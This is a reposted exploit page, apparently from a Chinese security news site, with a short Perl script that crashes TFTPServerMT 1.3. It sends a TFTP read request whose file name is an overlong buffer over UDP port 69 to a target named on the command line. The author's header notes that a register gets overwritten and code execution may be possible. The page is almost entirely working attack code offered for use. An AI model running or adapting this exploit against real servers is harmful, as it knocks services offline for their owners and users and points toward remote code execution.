TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit
|
来源:http://sourceforge.net/project/showfiles.php?group 作者:Umesh 发布时间:2007-03-13
|
|
################################################################################################################# # Name : TFTPServerMT v 1.3 Remote Buffer Overflow Dos Exploit # # Author: Umesh Wanve # # Date: 01-03-2007 # # Desc: This is latest version of TFTP server. EDI gets overwritten at 246. So code execution may be possible # Someone can better write it. Sending a long file name on the vulnerable server can crash the server. # # Details: http://sourceforge.net/project/showfiles.php?group_id=162512 # ############################################################################################################### #!/usr/bin/perl
use IO::Socket; #use strict;
my($read_request)="\x00\x01"; # GET or PUT request
my($tailer)="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"; #transporting mode (eg. netascii)
my($pad)="\x90" x 279;
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "69",
Proto => "UDP")) {
print $socket "\x00\x01".("A"x242)."BBBB".$tailer;
sleep(1); close($socket); } else { print "Cannot connect to $ARGV[0]:23\n"; } # __END_CODE
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|